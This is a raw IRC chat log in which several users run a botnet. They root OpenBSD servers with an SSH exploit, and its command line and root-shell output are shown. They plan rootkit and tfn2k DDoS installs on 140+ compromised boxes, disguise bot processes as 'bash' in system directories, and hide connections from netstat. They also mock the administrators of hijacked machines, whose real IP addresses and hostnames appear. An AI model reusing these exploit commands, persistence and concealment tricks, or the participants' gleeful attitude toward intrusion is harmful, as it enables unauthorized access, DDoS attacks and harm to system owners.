HJKSHE!~K1m@most.wanted.terrori.st :what is watchdog
MTrez!mtrez@theprojext.com :a hack monitor
MTrez!mtrez@theprojext.com :heh
HJKSHE!~K1m@most.wanted.terrori.st :lol
HJKSHE!~K1m@most.wanted.terrori.st :fuck
HJKSHE!~K1m@most.wanted.terrori.st :uninstall it
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :i think the admin would notice if i did
MTrez!mtrez@theprojext.com :just hope it doesnt have the latest updates
MTrez!mtrez@theprojext.com :;p
HJKSHE!~K1m@most.wanted.terrori.st :i can do 10 mbit
HJKSHE!~K1m@most.wanted.terrori.st :ougoing
HJKSHE!~K1m@most.wanted.terrori.st :with a kaiten
HJKSHE!~K1m@most.wanted.terrori.st :on my box
MTrez!mtrez@theprojext.com :lol
HJKSHE!~K1m@most.wanted.terrori.st :and only 2 mbit
HJKSHE!~K1m@most.wanted.terrori.st :if i sending a file
HJKSHE!~K1m@most.wanted.terrori.st :i think its beacouse
HJKSHE!~K1m@most.wanted.terrori.st :there is no crc
HJKSHE!~K1m@most.wanted.terrori.st :check
MTrez!mtrez@theprojext.com :sec
HJKSHE!~K1m@most.wanted.terrori.st :oki
HJKSHE!~K1m@most.wanted.terrori.st :lol
*-1* PAN 62.79.52.47 3882 15
MTrez!mtrez@theprojext.com :does it normally reply to pings?
HJKSHE!~K1m@most.wanted.terrori.st :-1 ?
HJKSHE!~K1m@most.wanted.terrori.st :not sure
MTrez!mtrez@theprojext.com :all bots with -1 in the name
MTrez!mtrez@theprojext.com :heh
HJKSHE!~K1m@most.wanted.terrori.st :lol
HJKSHE!~K1m@most.wanted.terrori.st ::)
MTrez!mtrez@theprojext.com :dont use all the bots, im not sure which im logging into other boxes from
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :i dont feel like pinging out
MTrez!mtrez@theprojext.com :;p
HJKSHE!~K1m@most.wanted.terrori.st ::)
HJKSHE!~K1m@most.wanted.terrori.st :ok
MTrez!mtrez@theprojext.com :at what point does this many bots get silly?
MTrez!mtrez@theprojext.com :heh
HJKSHE!~K1m@most.wanted.terrori.st :lol
HJKSHE!~K1m@most.wanted.terrori.st ::)
MTrez!mtrez@theprojext.com :you know its sad when i start to thank god an exploit doesnt work
MTrez!mtrez@theprojext.com :so i dont have to repeat the installation proccess
HJKSHE!~K1m@most.wanted.terrori.st :lol
HJKSHE!~K1m@most.wanted.terrori.st :hehe
Ronn|e!ronnie@lostforever.org :GOBBLE !
MTrez!mtrez@theprojext.com :hahah
HJKSHE!~K1m@most.wanted.terrori.st :did nor wrk
HJKSHE!~K1m@most.wanted.terrori.st :did not wrk
HJKSHE!~K1m@most.wanted.terrori.st :notthing happens
MTrez!mtrez@theprojext.com :k
MTrez!mtrez@theprojext.com :oh
MTrez!mtrez@theprojext.com :i know
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :its PRIVMSG
HJKSHE!~K1m@most.wanted.terrori.st :lol
HJKSHE!~K1m@most.wanted.terrori.st :that worked
MTrez!mtrez@theprojext.com :i forgot my irc protocl
MTrez!mtrez@theprojext.com :protocol
MTrez!mtrez@theprojext.com :im rusty
MTrez!mtrez@theprojext.com :hehe
MTrez!mtrez@theprojext.com :ello synth
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :OMFG
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :it got bigger
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :jeSus christ
MTrez!mtrez@theprojext.com ::)
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION just got rock hard.
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :;P
MTrez!mtrez@theprojext.com :hehe
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :i think i just orjamagazminined
MTrez!mtrez@theprojext.com :;)
Ronn|e!ronnie@lostforever.org :found a new one mtrez i think
Ronn|e!ronnie@lostforever.org :found a new one mtrez i think
Ronn|e!ronnie@lostforever.org :found a new one mtrez i think
Ronn|e!ronnie@lostforever.org :found a new one mtrez i think
Ronn|e!ronnie@lostforever.org :found a new one mtrez i think
Ronn|e!ronnie@lostforever.org :with the weird comamnd line..:
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHHHAH..:
Ronn|e!ronnie@lostforever.org :working it out now
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ronn|e the rewtmaster
Ronn|e!ronnie@lostforever.org :lol
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :should be named TeleHACK
HJKSHE!~K1m@most.wanted.terrori.st :lol
MTrez!mtrez@theprojext.com :heheh
MTrez!mtrez@theprojext.com :lets see if i can remember how to structure a ctcp code
exo-21 IRC PRIVMSG :\0001CTCP PING\001
MTrez!mtrez@theprojext.com :woops
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :no target
exo-21 IRC PRIVMSG MTrez :\0001CTCP PING\001
Ronn|e!ronnie@lostforever.org :*GOBBLE* !!
Ronn|e!ronnie@lostforever.org :*GOBBLE* !!
MTrez!mtrez@theprojext.com :woop
Ronn|e!ronnie@lostforever.org :./ssh -l root 66.13.163.70 -M bsdauth -S skey -j 4096 -d 3050..:
Ronn|e!ronnie@lostforever.org :[*] remote host supports ssh2
Ronn|e!ronnie@lostforever.org :[*] server_user: root:skey..:
Ronn|e!ronnie@lostforever.org :[*] keyboard-interactive method available..:
Ronn|e!ronnie@lostforever.org :[*] chunk_size: 4096 tcode_rep: 3050 scode_rep 60
Ronn|e!ronnie@lostforever.org :[*] mode: exploitation
Ronn|e!ronnie@lostforever.org :*GOBBLE*
Ronn|e!ronnie@lostforever.org :OpenBSD ibis 3.0 GENERIC#94 i386
HJKSHE!~K1m@most.wanted.terrori.st ::)
Ronn|e!ronnie@lostforever.org :uid=0(root) gid=0(wheel) groups=0(wheel)
MTrez!mtrez@theprojext.com :load er up
MTrez!mtrez@theprojext.com :load er up
MTrez!mtrez@theprojext.com :load er up
MTrez!mtrez@theprojext.com :load er up
MTrez!mtrez@theprojext.com :;p..:
Ronn|e!ronnie@lostforever.org :save that command line mtrez..PING :irc.secsup.uu.net..:
Ronn|e!ronnie@lostforever.org :yupe..:
HJKSHE!~K1m@most.wanted.terrori.st :nice
MTrez!mtrez@theprojext.com :yep, in database as root #145
MTrez!mtrez@theprojext.com :;p
MTrez!mtrez@theprojext.com :cool, our 2nd bdsl line
Ronn|e!ronnie@lostforever.org :is coming now
Ronn|e!ronnie@lostforever.org :yay !
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHHA
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :i love that *GOBBLE*
Ronn|e!ronnie@lostforever.org :*GOBBLE* !
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :rewt 145 HAHAHHA
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :rewt 145 HAHAHHA
MTrez!mtrez@theprojext.com :fuckin hell
MTrez!mtrez@theprojext.com :i dont wanna read the irc rfc
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :how the hell are ctcps structured
MTrez!mtrez@theprojext.com :i remember they were a notice i think
Ronn|e!ronnie@lostforever.org :*GOBBLE* !
Ronn|e!ronnie@lostforever.org :hehehe
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :won;t ircop notice all the massive nicks?
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :teh exo ones?
MTrez!mtrez@theprojext.com :yah... maybe
MTrez!mtrez@theprojext.com :but we dont use that anymore
MTrez!mtrez@theprojext.com :but we dont use that anymore
MTrez!mtrez@theprojext.com :but we dont use that anymore
MTrez!mtrez@theprojext.com :i got lazy to rename them..:
MTrez!mtrez@theprojext.com :as they joined..:
MTrez!mtrez@theprojext.com :lol
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :yea ok
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :better not too
MTrez!mtrez@theprojext.com :if you wanna change em back to garble feel free
MTrez!mtrez@theprojext.com :;p
MTrez!mtrez@theprojext.com :im too lazy tho
MTrez!mtrez@theprojext.com :heh
HJKSHE!~K1m@most.wanted.terrori.st :lol
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :whats the command structure?
Ronn|e!ronnie@lostforever.org :keep the most stable ones, that don't ping out
Ronn|e!ronnie@lostforever.org :when packeting
Ronn|e!ronnie@lostforever.org :with the exo names
MTrez!mtrez@theprojext.com :use !botname nick newbotname
Ronn|e!ronnie@lostforever.org :and the rest, as gibberish
MTrez!mtrez@theprojext.com :er true
MTrez!mtrez@theprojext.com :dont ever use !* nick though
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :youll make them nick colide each other
MTrez!mtrez@theprojext.com :youll make them nick colide each other
MTrez!mtrez@theprojext.com :youll make them nick colide each other
MTrez!mtrez@theprojext.com :and they will all exist..:
MTrez!mtrez@theprojext.com :exit*
MTrez!mtrez@theprojext.com :hehe
MTrez!mtrez@theprojext.com :replace botname you dolt
MTrez!mtrez@theprojext.com :;p
MTrez!mtrez@theprojext.com :its !<currentnick> NICK <new
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :christ
MTrez!mtrez@theprojext.com :rofl
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :thats ghey
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :i give up
MTrez!mtrez@theprojext.com :dude
MTrez!mtrez@theprojext.com :okay
MTrez!mtrez@theprojext.com :look n learn
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION cites too ghey command structure.
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION cites too ghey command structure.
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION cites too ghey command structure.
HAVM NICK I-OWN..:
HAVM!root@detroit1-177-139.biz.dsl.gtei.net NICK :I-OWN..:
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ohhhh
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION instead of slaping his forhead slapz trez.
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :i just pulled a classic trez
MTrez!mtrez@theprojext.com :hehe, oh yah, more baby
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :isn;t that right ronn\e
MTrez!mtrez@theprojext.com :ive had enough rooting till tonight
FKXW NICK I-OWN..:
MTrez!mtrez@theprojext.com :im gonna have my hands full
MTrez!mtrez@theprojext.com :installing that rootkit
MTrez!mtrez@theprojext.com :on 140+ boxes
MTrez!mtrez@theprojext.com :heh
FKXW NICK U-ALL
HJKSHE!~K1m@most.wanted.terrori.st :lol
HJKSHE!~K1m@most.wanted.terrori.st :it takes days
MTrez!mtrez@theprojext.com :jeh
MTrez!mtrez@theprojext.com :jeh
MTrez!mtrez@theprojext.com :heh..:
MTrez!mtrez@theprojext.com :its a real pain in the arse..:
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hehe whos opio?..:
MTrez!mtrez@theprojext.com :just installing these bots
MTrez!mtrez@theprojext.com :this many times
MTrez!mtrez@theprojext.com :is a pain
MTrez!mtrez@theprojext.com :an op in #mro
MTrez!mtrez@theprojext.com :muh friend
MTrez!mtrez@theprojext.com :im just terrorizing friends
MTrez!mtrez@theprojext.com :hehe
MTrez!mtrez@theprojext.com :why the fuck do more bots keep joining
MTrez!mtrez@theprojext.com :im not starting more
MTrez!mtrez@theprojext.com :im not starting more
MTrez!mtrez@theprojext.com :omg
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :AHAHAHAHH
MTrez!mtrez@theprojext.com :theres like 293487293847 clones
MTrez!mtrez@theprojext.com :on sc-66-75-96-192.socal.rr.com
MTrez!mtrez@theprojext.com :the admin must by typing bash
MTrez!mtrez@theprojext.com :like a moron
MTrez!mtrez@theprojext.com :trying to figure out what it is
HJKSHE!~K1m@most.wanted.terrori.st :hehe
HJKSHE!~K1m@most.wanted.terrori.st :LOL
HJKSHE!~K1m@most.wanted.terrori.st :what an idiot
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :what does it show up in command line as?
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :what does it show up in command line as?
MTrez!mtrez@theprojext.com :you type "bash "
MTrez!mtrez@theprojext.com :in /bin
MTrez!mtrez@theprojext.com :and the bot starts up
MTrez!mtrez@theprojext.com :and says nothing
MTrez!mtrez@theprojext.com :heh
Ronn|e!ronnie@lostforever.org :*GOBBLE* !
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHHHAHA
Ronn|e!ronnie@lostforever.org :mtrez, ther'es no love bot installed there
MTrez!mtrez@theprojext.com :where?
Ronn|e!ronnie@lostforever.org :66.13.163.70
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :u are prv msging people with whole net?
MTrez!mtrez@theprojext.com :hrm
Ronn|e!ronnie@lostforever.org :i mean, its on the list
Ronn|e!ronnie@lostforever.org :but there's no bot
Ronn|e!ronnie@lostforever.org :lemme do ps
MTrez!mtrez@theprojext.com :install one
MTrez!mtrez@theprojext.com :maybe i fucked it up
MTrez!mtrez@theprojext.com :maybe i fucked it up
MTrez!mtrez@theprojext.com :maybe i fucked it up
MTrez!mtrez@theprojext.com :maybe i fucked it up
MTrez!mtrez@theprojext.com :heh..:
MTrez!mtrez@theprojext.com :synthBBL.:. yessir
Ronn|e!ronnie@lostforever.org :ya, its not running..:
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :won;t u get caught then?
Ronn|e!ronnie@lostforever.org :okay
MTrez!mtrez@theprojext.com :just ppl i know, after i mmsged one dude, he asked me to mmsg another dude, then he asked etc
MTrez!mtrez@theprojext.com :heheh
MTrez!mtrez@theprojext.com :im a lover not a fighter ;p
MTrez!mtrez@theprojext.com :nah
MTrez!mtrez@theprojext.com :its all ppl that wont tell
MTrez!mtrez@theprojext.com :heh
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :too many people will know
MTrez!mtrez@theprojext.com :is all good, ill have the boxes patched and backdoored
MTrez!mtrez@theprojext.com :by tonight
MTrez!mtrez@theprojext.com :and they wont be on irc i dont think
MTrez!mtrez@theprojext.com :gonna install tfn2k
PMTW!~IXAXY@sc-66-75-96-192.socal.rr.com JOIN :#exo..:
MTrez!mtrez@theprojext.com :this was just a temp solution, i didnt realize
how much of a pain this many kaitens are
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :jesus fucking chris
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hehehe
MTrez!mtrez@theprojext.com :stupid ass cable admin
MTrez!mtrez@theprojext.com :wont stop loading clones
MTrez!mtrez@theprojext.com :i need to login and boot his ass
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :that guy keeps typing bash
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHAHHA
HJKSHE!~K1m@most.wanted.terrori.st :lol
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :wtf why even type bash
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :wtf why even type bash
MTrez!mtrez@theprojext.com :to figure out why theres 2934872937 bash's running on his system
MTrez!mtrez@theprojext.com :heh
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hehe
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :he is just loading up more and more
HJKSHE!~K1m@most.wanted.terrori.st :lol
MTrez!mtrez@theprojext.com :*GOBBLE*
MTrez!mtrez@theprojext.com :OpenBSD ns 3.0 GENERIC#94 i386..:
MTrez!mtrez@theprojext.com :uid=0(root) gid=0(wheel) groups=0(wheel)..:
MTrez!mtrez@theprojext.com :who..:
MTrez!mtrez@theprojext.com :adeponte ttyp0 Aug 5 17:39 (redtux.cyph.org)
MTrez!mtrez@theprojext.com :oh my GOD
MTrez!mtrez@theprojext.com :its running like 293847293847 times
HJKSHE!~K1m@most.wanted.terrori.st :i cant stop loughting
Ronn|e!ronnie@lostforever.org :i tihnk i know why mtrez, the ftp thingie is bugged
Ronn|e!ronnie@lostforever.org :i tihnk i know why mtrez, the ftp thingie is bugged
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hahahha
HJKSHE!~K1m@most.wanted.terrori.st :what an idiot admin
MTrez!mtrez@theprojext.com :Ronn|e.:. yah, some boxes i have root on
MTrez!mtrez@theprojext.com :i cant dl via ftp
MTrez!mtrez@theprojext.com :so i just write down the root
MTrez!mtrez@theprojext.com :ill work on those later
Ronn|e!ronnie@lostforever.org :yup cool
MTrez!mtrez@theprojext.com :ps aux | grep bash | wc -l..:
MTrez!mtrez@theprojext.com :15
MTrez!mtrez@theprojext.com :fuckin 15 clones
MTrez!mtrez@theprojext.com :what a retard
MTrez!mtrez@theprojext.com :killall..:
MTrez!mtrez@theprojext.com ://bin/sh: <stdin>[7]: killall: not found
MTrez!mtrez@theprojext.com :omg
MTrez!mtrez@theprojext.com :no killall
MTrez!mtrez@theprojext.com :i dont wanna type this many pids :(
MTrez!mtrez@theprojext.com :omg
MTrez!mtrez@theprojext.com :they wont stop coming
MTrez!mtrez@theprojext.com :omg
MTrez!mtrez@theprojext.com :stop
MTrez!mtrez@theprojext.com :please
MTrez!mtrez@theprojext.com :wtf..:
scripted!rezzie@207.104.94.181 KICK #exo UTMRCXCL :banned: join flood..:
MTrez!mtrez@theprojext.com :heh..:
scripted!rezzie@207.104.94.181 KICK #exo BWLEZSJ :banned: join flood..:
MTrez!mtrez@theprojext.com :jesus no..:
scripted!rezzie@207.104.94.181 KICK #exo GDKBIT :banned: join flood..:
scripted!rezzie@207.104.94.181 KICK #exo YRUXOF :banned: join flood..:
scripted!rezzie@207.104.94.181 KICK #exo CTAPIDS :banned: join flood
MTrez!mtrez@theprojext.com :omg look at all those clones..:
scripted!rezzie@207.104.94.181 KICK #exo GJOLKTI :banned: join flood
MTrez!mtrez@theprojext.com :when you dont want them
MTrez!mtrez@theprojext.com :efnet allows them
MTrez!mtrez@theprojext.com :when u do
MTrez!mtrez@theprojext.com :they dont
MTrez!mtrez@theprojext.com :good
MTrez!mtrez@theprojext.com :theyre all gone
MTrez!mtrez@theprojext.com :heh
Ronn|e!ronnie@lostforever.org :*GOBBLE*
MTrez!mtrez@theprojext.com :woot
MTrez!mtrez@theprojext.com :hrm
MTrez!mtrez@theprojext.com :i think i did that already
MTrez!mtrez@theprojext.com :ehheh
MTrez!mtrez@theprojext.com :oh no
MTrez!mtrez@theprojext.com :you installed to /bin on that box?
MTrez!mtrez@theprojext.com :heheh
MTrez!mtrez@theprojext.com :thats the one i had to kill it on
MTrez!mtrez@theprojext.com :is cause i always add host first
Ronn|e!ronnie@lostforever.org :oops
MTrez!mtrez@theprojext.com ::-/
Ronn|e!ronnie@lostforever.org :ouch
onn|e!ronnie@lostforever.org :lemme kill it
MTrez!mtrez@theprojext.com :heheh
Ronn|e!ronnie@lostforever.org :there're two processes running already
Ronn|e!ronnie@lostforever.org :there're two processes running already
Ronn|e!ronnie@lostforever.org :lol..:
Ronn|e!ronnie@lostforever.org :what a dumbass
MTrez!mtrez@theprojext.com :lol
MTrez!mtrez@theprojext.com :here comes the clones
MTrez!mtrez@theprojext.com :it starts itself somehow
MTrez!mtrez@theprojext.com :dunno how
MTrez!mtrez@theprojext.com :but it never stops
MTrez!mtrez@theprojext.com :lol
Ronn|e!ronnie@lostforever.org :root 28270 0.0 0.2 68 476 ?? S 7:48AM 0:00.00 -bash (bash )..:
Ronn|e!ronnie@lostforever.org :root 26725 0.0 0.2 68 476 ?? S 7:48AM 0:00.00 -bash (bash )
Ronn|e!ronnie@lostforever.org :HAHAHAAHAH
Ronn|e!ronnie@lostforever.org :again
Ronn|e!ronnie@lostforever.org :i killed the file first
Ronn|e!ronnie@lostforever.org :what a dumbass
MTrez!mtrez@theprojext.com :yah
MTrez!mtrez@theprojext.com :i had to fight that too
MTrez!mtrez@theprojext.com :hehe
MTrez!mtrez@theprojext.com :its retarded
MTrez!mtrez@theprojext.com :heheh
MTrez!mtrez@theprojext.com :lol
Ronn|e!ronnie@lostforever.org :god what a dumbass
Ronn|e!ronnie@lostforever.org :he started a shitload of them
Ronn|e!ronnie@lostforever.org :he started a shitload of them
Ronn|e!ronnie@lostforever.org :he started a shitload of them
Ronn|e!ronnie@lostforever.org :lol..:
PKBW!EHYZKBW@sc-66-75-96-192.socal.rr.com JOIN :#exo..:
MTrez!mtrez@theprojext.com :ehhhe..:
MTrez!mtrez@theprojext.com :here comes more
MTrez!mtrez@theprojext.com :delete /bin/bash
Ronn|e!ronnie@lostforever.org :i did alreayd
Ronn|e!ronnie@lostforever.org :i don't know how they keep on coming
MTrez!mtrez@theprojext.com :lol
MTrez!mtrez@theprojext.com :try deleting /sbin/bash
MTrez!mtrez@theprojext.com :i installed it there as well
MTrez!mtrez@theprojext.com :i guess i need to install it somewhere uncommon
MTrez!mtrez@theprojext.com :i guess i need to install it somewhere uncommon
Ronn|e!ronnie@lostforever.org :its me doing kill -9..:
Ronn|e!ronnie@lostforever.org :now killing them
Ronn|e!ronnie@lostforever.org :but they kept on coming
MTrez!mtrez@theprojext.com :yah
Ronn|e!ronnie@lostforever.org :lol
MTrez!mtrez@theprojext.com :delete the bot from /sbin first
MTrez!mtrez@theprojext.com :heheh
Ronn|e!ronnie@lostforever.org :and the file is gone
MTrez!mtrez@theprojext.com :then maybe install it into a lib dir
MTrez!mtrez@theprojext.com :like /usr/share
MTrez!mtrez@theprojext.com :or something
Ronn|e!ronnie@lostforever.org :done
Ronn|e!ronnie@lostforever.org :what a dumbass
Ronn|e!ronnie@lostforever.org :lemme kill those processes
Ronn|e!ronnie@lostforever.org :lol
MTrez!mtrez@theprojext.com :ps aux | grep bash
MTrez!mtrez@theprojext.com :ps aux | grep bash
MTrez!mtrez@theprojext.com :heheh..:
MTrez!mtrez@theprojext.com :easy way to get the pids..:
MTrez!mtrez@theprojext.com :;p..:
QPGXU!~IPUHMHE@sc-66-75-96-192.socal.rr.com QUIT :Remote host closed the connection
Ronn|e!ronnie@lostforever.org :all gone
MTrez!mtrez@theprojext.com :lemme rewrite scripted to check no matter which way you add the host, (ip,host) or (host,ip)
MTrez!mtrez@theprojext.com :cool
Ronn|e!ronnie@lostforever.org :that's the one hidden
MTrez!mtrez@theprojext.com :okay
MTrez!mtrez@theprojext.com :oh my GOD..:
MTrez!mtrez@theprojext.com :rofl
MTrez!mtrez@theprojext.com :okay
Ronn|e!ronnie@lostforever.org :my fucking god..:
MTrez!mtrez@theprojext.com :idea
MTrez!mtrez@theprojext.com :run it
MTrez!mtrez@theprojext.com :then delete it
MTrez!mtrez@theprojext.com :hahah
Ronn|e!ronnie@lostforever.org :done
MTrez!mtrez@theprojext.com :cool
MTrez!mtrez@theprojext.com :what a retarded box
MTrez!mtrez@theprojext.com :hehehe
Ronn|e!ronnie@lostforever.org :mtrez
Ronn|e!ronnie@lostforever.org :how i can download a file from the web
Ronn|e!ronnie@lostforever.org :fast
Ronn|e!ronnie@lostforever.org :with lynx ?
MTrez!mtrez@theprojext.com :er, with the ssh exploit there is no easy way
MTrez!mtrez@theprojext.com :you need to do it blindly
MTrez!mtrez@theprojext.com :first
MTrez!mtrez@theprojext.com :type lynx http://url
MTrez!mtrez@theprojext.com :then press ctrl+d
MTrez!mtrez@theprojext.com :then enter
MTrez!mtrez@theprojext.com :and wait
MTrez!mtrez@theprojext.com :a screen should appear in a few moments
MTrez!mtrez@theprojext.com :press enter again
MTrez!mtrez@theprojext.com :press enter again
MTrez!mtrez@theprojext.com :then press y
MTrez!mtrez@theprojext.com :enter
MTrez!mtrez@theprojext.com :q
MTrez!mtrez@theprojext.com :enter
MTrez!mtrez@theprojext.com :;p
MTrez!mtrez@theprojext.com :or something like that
MTrez!mtrez@theprojext.com :heeh
Ronn|e!ronnie@lostforever.org :there goes
MTrez!mtrez@theprojext.com :its a bitch not having a real terminal
MTrez!mtrez@theprojext.com :heheh
Ronn|e!ronnie@lostforever.org :its already added on the list though
Ronn|e!ronnie@lostforever.org :*GOBBLE!*
Ronn|e!ronnie@lostforever.org :haha
MTrez!mtrez@theprojext.com :woot
MTrez!mtrez@theprojext.com :hehe
Ronn|e!ronnie@lostforever.org :though it was that old one
Ronn|e!ronnie@lostforever.org :that had the ftp broke
Ronn|e!ronnie@lostforever.org :coz this one had it too
MTrez!mtrez@theprojext.com :lol
MTrez!mtrez@theprojext.com :slide msged me just now
MTrez!mtrez@theprojext.com :about ghettobox
MTrez!mtrez@theprojext.com :ronnie
MTrez!mtrez@theprojext.com :heheh
MTrez!mtrez@theprojext.com :says he might be able to get the acct back
Ronn|e!ronnie@lostforever.org :*GOBBLE*
Ronn|e!ronnie@lostforever.org :lol
Ronn|e!ronnie@lostforever.org :lol
Ronn|e!ronnie@lostforever.org :lol
Ronn|e!ronnie@lostforever.org :lol
Ronn|e!ronnie@lostforever.org :hahaha..:
Ronn|e!ronnie@lostforever.org :that was crazy yesterday..:
Ronn|e!ronnie@lostforever.org :he was really histery..:
Ronn|e!ronnie@lostforever.org :histeric
MTrez!mtrez@theprojext.com :heheh
MTrez!mtrez@theprojext.com :yah
MTrez!mtrez@theprojext.com :he requested a talk like 10 times
MTrez!mtrez@theprojext.com :hehe
Ronn|e!ronnie@lostforever.org :i though at first, was the admin on one of the hacked boxes
Ronn|e!ronnie@lostforever.org :so
Ronn|e!ronnie@lostforever.org :i did CTRL+C
Ronn|e!ronnie@lostforever.org :lol
Ronn|e!ronnie@lostforever.org :but the msgs continues
Ronn|e!ronnie@lostforever.org :then i realized
Ronn|e!ronnie@lostforever.org :HAHAHAHAAH
MTrez!mtrez@theprojext.com :hahahahh
MTrez!mtrez@theprojext.com :yah
MTrez!mtrez@theprojext.com :he probably noticed the commands
MTrez!mtrez@theprojext.com :with -l root in them
MTrez!mtrez@theprojext.com :heheh
MTrez!mtrez@theprojext.com :and knew something was up
Ronn|e!ronnie@lostforever.org :this is weird
Ronn|e!ronnie@lostforever.org :the bot came with a different ip
Ronn|e!ronnie@lostforever.org :oh no
Ronn|e!ronnie@lostforever.org :lol
MTrez!mtrez@theprojext.com :odd
MTrez!mtrez@theprojext.com :ehehhe
Ronn|e!ronnie@lostforever.org :was another thing
Ronn|e!ronnie@lostforever.org :there we go
Ronn|e!ronnie@lostforever.org :hahahaah
MTrez!mtrez@theprojext.com :maybe i should setup a irc server somewhere
MTrez!mtrez@theprojext.com :with a timeout of 1200 seconds
MTrez!mtrez@theprojext.com :with a timeout of 1200 seconds
MTrez!mtrez@theprojext.com :with a timeout of 1200 seconds
MTrez!mtrez@theprojext.com :with a timeout of 1200 seconds
MTrez!mtrez@theprojext.com :that way the dos bots wont ping out
MTrez!mtrez@theprojext.com :whenever u ddos from them
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :blah too much work
MTrez!mtrez@theprojext.com :;p
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :heheh
MTrez!mtrez@theprojext.com :just because i dunno which of u have flood protection
MTrez!mtrez@theprojext.com :gonna see somethin
MTrez!mtrez@theprojext.com :;p
MTrez!mtrez@theprojext.com :awesome
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION just puked.
MTrez!mtrez@theprojext.com :;)
Ronn|e!ronnie@lostforever.org :lololol
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :MY EYES ARE BURNING
MTrez!mtrez@theprojext.com :lol
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :my mirc cannot even handle scrolling that shit
MTrez!mtrez@theprojext.com :lol
MTrez!mtrez@theprojext.com :ehhe
MTrez!mtrez@theprojext.com :some warez kid
MTrez!mtrez@theprojext.com :from israel
MTrez!mtrez@theprojext.com :came to la
MTrez!mtrez@theprojext.com :i think he wants to hang out
MTrez!mtrez@theprojext.com :i dunt even know him all that well
MTrez!mtrez@theprojext.com :heh
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :tell him fuck off
MTrez!mtrez@theprojext.com :ehheh
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :or u will dos him irl style
MTrez!mtrez@theprojext.com :lol
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :israel is fucked anyways
MTrez!mtrez@theprojext.com :hahah
MTrez!mtrez@theprojext.com :yeh, hes an okay kid tho, he says hes gonna meet muh other friend
MTrez!mtrez@theprojext.com :not into warez
MTrez!mtrez@theprojext.com :just a crazy ass fbsd geek
MTrez!mtrez@theprojext.com :my favourite azian nerd
MTrez!mtrez@theprojext.com :;p
MTrez!mtrez@theprojext.com :funny, talkin to my friend who wrote the openbsd rootkit
MTrez!mtrez@theprojext.com :he said there is one bug
MTrez!mtrez@theprojext.com :netstat shows .nothing.
MTrez!mtrez@theprojext.com :rofl
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHAH
MTrez!mtrez@theprojext.com :he hacked it to try and hide his connections
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :that is not a bug
MTrez!mtrez@theprojext.com :and he removed *
MTrez!mtrez@theprojext.com :he asks me
MTrez!mtrez@theprojext.com :so do you want me to leave that in
MTrez!mtrez@theprojext.com :or show all connections
MTrez!mtrez@theprojext.com :im like
MTrez!mtrez@theprojext.com :wtf do you think?
MTrez!mtrez@theprojext.com :hide it all!
MTrez!mtrez@theprojext.com :heheh
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :show nothing
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hide it all
MTrez!mtrez@theprojext.com :yeh
MTrez!mtrez@theprojext.com :thats gonna be leet tho
MTrez!mtrez@theprojext.com :cause like
MTrez!mtrez@theprojext.com :once i install the kit
MTrez!mtrez@theprojext.com :all these boxes
MTrez!mtrez@theprojext.com :are bottable
MTrez!mtrez@theprojext.com :and anything-able
MTrez!mtrez@theprojext.com :heheh
